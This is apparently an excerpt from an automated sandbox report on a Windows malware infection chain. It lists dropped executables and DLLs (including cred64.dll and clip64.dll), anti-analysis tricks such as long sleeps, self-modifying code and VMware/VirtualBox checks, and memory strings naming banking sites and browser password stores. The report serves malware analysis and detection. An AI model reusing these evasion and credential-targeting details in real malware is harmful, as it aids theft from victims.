                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: A6B7A7 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: A6B895 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: C30C4F instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSpecial instruction interceptor: First address: A6B794 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory allocated: 6D0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory allocated: 2460000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory allocated: A60000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05560D2E rdtsc 0_2_05560D2E
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 180000
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow / User API: threadDelayed 1272Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow / User API: threadDelayed 1286Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow / User API: threadDelayed 1280Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow / User API: threadDelayed 1258Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow / User API: threadDelayed 1191Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeWindow / User API: threadDelayed 991Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeWindow / User API: threadDelayed 1035
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeWindow / User API: threadDelayed 1385
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exeJump to dropped file
                                Source: C:\Windows\System32\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000149001\gold.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exeJump to dropped file
                                Source: C:\Windows\System32\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000208001\install.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000152001\jok.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeAPI coverage: 3.5 %
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6052Thread sleep time: -52026s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2452Thread sleep count: 1272 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2452Thread sleep time: -2545272s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 4164Thread sleep count: 1286 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 4164Thread sleep time: -2573286s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6628Thread sleep count: 1280 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 6628Thread sleep time: -2561280s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2684Thread sleep count: 216 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2684Thread sleep time: -6480000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 4832Thread sleep count: 1258 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 4832Thread sleep time: -2517258s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2636Thread sleep time: -1260000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2472Thread sleep count: 1191 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe TID: 2472Thread sleep time: -2383191s >= -30000sJump to behavior
                                Source: C:\Windows\System32\svchost.exe TID: 7064Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe TID: 8188Thread sleep count: 1035 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe TID: 8188Thread sleep count: 213 > 30
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7628Thread sleep count: 37 > 30
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1100Thread sleep count: 35 > 30
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe TID: 8852Thread sleep count: 107 > 30
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10860Thread sleep count: 42 > 30
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10860Thread sleep time: -84042s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10852Thread sleep count: 33 > 30
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10852Thread sleep time: -66033s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10868Thread sleep count: 39 > 30
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10868Thread sleep time: -78039s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 2668Thread sleep count: 162 > 30
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 2668Thread sleep time: -4860000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 5324Thread sleep time: -1260000s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10872Thread sleep count: 45 > 30
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 10872Thread sleep time: -90045s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 2668Thread sleep time: -30000s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8112Thread sleep time: -150000s >= -30000s
                                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeThread sleep count: Count: 1035 delay: -10
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeThread sleep count: Count: 1385 delay: -10
                                Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0010C2A2 FindFirstFileExW,4_2_0010C2A2
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001468EE FindFirstFileW,FindClose,4_2_001468EE
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,4_2_0014698F
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0013D076
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,4_2_0013D3A9
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00149642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00149642
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0014979D
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00149B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,4_2_00149B2B
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,4_2_0013DBBE
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00145C97 FindFirstFileW,FindNextFileW,FindClose,4_2_00145C97
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008333B0 FindFirstFileA,FindNextFileA,8_2_008333B0
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00853B20 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error,8_2_00853B20
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007A1F8C FindFirstFileExW,8_2_007A1F8C
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_000D42DE
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 30000
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 180000
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread delayed: delay time: 30000
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\Documents\desktop.ini
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\AppData
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\AppData\Local
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.00000000014F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                Source: MPGPH131.exe, 00000013.00000002.2506556496.0000000007E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}B
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
                                Source: svchost.exe, 0000001E.00000003.2431230424.000001EFCEC58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTcpV6VMWare
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3326542226.000002AF2AC57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3254451023.000002AF2542B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.0000000001440000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                Source: RageMP131.exe, 0000001F.00000003.2387394578.00000000014E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007C0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}gramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsta_dat
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.000000000170A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}2
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\Profiles\v6zchhhv.default-release\signons.sqlite
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                                Source: file.exe, 00000000.00000003.2008235072.00000000017F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                Source: MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_7BBA5097eq
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\*
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv>
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_7BBA5097e
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW #
                                Source: MPGPH131.exe, 00000014.00000002.2539684694.0000000007990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ill_sync_metadata
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                Source: explorta.exe, explorta.exe, 00000003.00000002.2067305894.0000000000791000.00000040.00000001.01000000.00000007.sdmp, 2531414c80.exe, 2531414c80.exe, 00000008.00000002.2507620764.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2498548418.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000002.2531990247.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, 2531414c80.exe, 00000018.00000002.2403608510.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, amert.exe, 0000001A.00000002.2452955674.0000000000A5E000.00000040.00000001.01000000.0000000E.sdmp, RageMP131.exe, 0000001F.00000002.2448644551.000000000106D000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.0000000001460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                                Source: MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_7BBA5097
                                Source: b3168c3d9b.exe, 0000000F.00000003.2488602462.0000000003F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(a
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                                Source: RageMP131.exe, 0000001F.00000002.2450136740.00000000014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&0<
                                Source: MPGPH131.exe, 00000013.00000002.2507231203.0000000008422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}*k#
                                Source: MPGPH131.exe, 00000014.00000003.2235461744.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}w>
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&U?
                                Source: amert.exe, 0000001A.00000003.2428413473.00000000011CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{5
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0wO
